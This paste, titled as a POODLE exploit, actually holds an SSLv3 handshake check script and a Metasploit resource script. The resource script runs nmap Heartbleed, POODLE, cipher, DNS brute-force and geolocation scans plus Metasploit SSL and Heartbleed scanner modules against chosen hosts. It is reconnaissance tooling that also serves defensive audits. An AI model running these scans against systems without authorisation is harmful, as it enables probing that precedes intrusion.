r00t-3xp10it

poodle exploit [under-develop]

Sep 23rd, 2015
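#!/usr/bin/env bash
# poodle check
#
# Asks for a host, attempts an SSLv3-only handshake against <host>:443 with
# `openssl s_client -ssl3`, and reports whether a session was negotiated.
#
# What the result means: a negotiated session shows that the server still
# accepts SSLv3. The POODLE weakness concerns CBC-mode cipher suites under
# SSLv3, so review the printed protocol/cipher pair before drawing
# conclusions. Remediation is to disable SSLv3 on the server.
#
# Exit status (unchanged from the original for the existing paths):
#   0  no SSLv3 session could be established
#   1  SSLv3 session established, or the connection timed out
#   2  the check could not be performed (bad input / local openssl limits)

# Use timeout(1) when present so an unresponsive host cannot hang the check.
timeout_bin=$(command -v timeout 2>/dev/null)

if ! command -v openssl >/dev/null 2>&1; then
  echo "error: openssl not found in PATH." >&2
  exit 2
fi

# Many current openssl builds are compiled without SSLv3. In that case
# s_client rejects -ssl3, prints no 'Cipher is' line, and the script would
# report "Not vulnerable" for every host. Best-effort probe: the option list
# only mentions -ssl3 when the build supports it.
# NOTE(review): a system-wide minimum-protocol policy can still block SSLv3
# on the client side even when -ssl3 is listed; confirm on the scanning host.
if ! openssl s_client -help 2>&1 </dev/null | grep -q -- '-ssl3'; then
  echo "error: local openssl has no SSLv3 support (-ssl3); result would be inconclusive." >&2
  exit 2
fi

printf '%s\n' "[*] Input Target RHOST - example: 192.44.100.86"
printf '%s' "[>]:"
read -r _target

# The value is placed on the openssl command line, so accept only a plain
# hostname or IPv4 address: no whitespace, no leading '-', no shell syntax.
target_re='^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$'
if [[ ! $_target =~ $target_re ]]; then
  echo "error: target must be a hostname or IPv4 address." >&2
  exit 2
fi

echo ""
printf '%s' "[*] $_target:443 - "

# Build the command as an array so the target stays a single argument.
probe=(openssl s_client -ssl3 -connect "${_target}:443")
if [[ -n $timeout_bin ]]; then
  probe=("$timeout_bin" 5 "${probe[@]}")
fi

# 'Q' makes s_client close the session right after the handshake.
out=$(printf 'Q\n' | "${probe[@]}" 2>/dev/null)
probe_status=$?

# timeout(1) exits with 124 when it had to kill the command.
if [[ $probe_status -eq 124 ]]; then
  echo "error: Timeout connecting to host!"
  exit 1
fi

# No 'Cipher is' line means no handshake completed at all. This covers a
# server refusing SSLv3 as well as a closed port or unreachable host.
if ! grep -q 'Cipher is' <<<"$out"; then
  echo 'Not vulnerable.  Failed to establish SSL connection.'
  exit 0
fi

# Third field of the "Protocol :" and "Cipher :" session lines.
proto=$(awk '/^ *Protocol *:/ { print $3 }' <<<"$out")
cipher=$(awk '/^ *Cipher *:/ { print $3 }' <<<"$out")

# s_client prints 0000 or (NONE) as the cipher when nothing was negotiated.
if [[ $cipher == '0000' || $cipher == '(NONE)' ]]; then
  echo 'Not vulnerable.  Failed to establish SSLv3 connection.'
  exit 0
else
  echo "Vulnerable!  SSLv3 connection established using: $proto/$cipher"
  exit 1
fi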
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49. #--------------------------->
  50.  
  51.  
  52.  
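<ruby>
# Metasploit resource-script step: refresh nmap's NSE script index, make sure
# a global RHOSTS is set, then run two nmap passes against port 443.
print_line("")
print_good("please Wait, updating [ NSE ] database...")
run_single("nmap --script-updatedb")
print_line("")
print_status("Please wait, checking if RHOSTS is set globally...")

# Treat an empty or whitespace-only value the same as an unset one.
rhosts = framework.datastore['RHOSTS'].to_s.strip
if rhosts.empty?
  print_error("[ERROR] Please set RHOSTS globally: setg RHOSTS xxx.xxx.xxx.xxx")
  return
end

# RHOSTS is interpolated into a command line below. Accept only characters
# that occur in host names, addresses, CIDR ranges and host lists, so the
# value cannot carry shell syntax.
# NOTE(review): presumably run_single hands non-console commands such as nmap
# to the system shell; confirm against the console version in use.
unless rhosts =~ /\A[\w.:\/,\- ]+\z/
  print_error("[ERROR] RHOSTS contains unexpected characters: setg RHOSTS xxx.xxx.xxx.xxx")
  return
end

# Results are written as plain-text reports (-oN) to the files LiLiP4tH and
# Lt0P4tH in the current directory.
# NOTE(review): the original comment said this populates the Metasploit
# database, but plain nmap with -oN only writes files; db_nmap is the console
# command that imports results. Confirm which was intended.
# NOTE(review): -sS normally needs raw-socket privileges, and
# ip-geolocation-geoplugin queries a third-party web service with the target
# address.
print_good("RHOSTS set globally [ OK ], running scans...")
run_single("nmap -n -sS -Pn -oN LiLiP4tH --script ssl-ccs-injection.nse,ssl-heartbleed.nse --script-args vulns.showall -p 443 #{rhosts}")
run_single("nmap -T4 -sV -Pn -oN Lt0P4tH --script ssl-poodle.nse,ssl-cert.nse,ssl-enum-ciphers.nse,dns-brute.nse,ip-geolocation-geoplugin.nse -p 443 #{rhosts}")
print_line("")
print_good("Please wait, running msf auxiliary modules...")
</ruby>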
  71.  
# Select and run the SSL/TLS auxiliary scanners one after another. No options
# are set here, so each module presumably picks up the global RHOSTS (setg)
# that the first <ruby> block requires.
use auxiliary/scanner/http/ssl_version
run
use auxiliary/scanner/http/ssl
run
use auxiliary/scanner/ssl/openssl_heartbleed
run
# NOTE(review): no `run` follows this `use`, so the module is only selected
# and left as the active module; confirm whether that is intended.
use auxiliary/server/openssl_heartbeat_client_memory
  79.  
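# Run the SSLv3 connection check script
<ruby>
poodle_script = "/tmp/poodle.sh"
print_line("")

# /tmp is writable by every local user, so a fixed name there can be created
# or replaced by someone else before this line runs. Execute the script only
# when it is a regular file (not a symlink), owned by the current user, and
# not writable by group or others.
script_stat = begin
  File.lstat(poodle_script)
rescue SystemCallError
  nil
end

if script_stat && script_stat.file? && script_stat.owned? && (script_stat.mode & 0022) == 0
  print_good("trying to connect to openssl...")
  run_single(poodle_script)
else
  print_error("[ERROR] #{poodle_script} is missing, not a regular file, not owned by the current user, or writable by others; not running it")
end
</ruby>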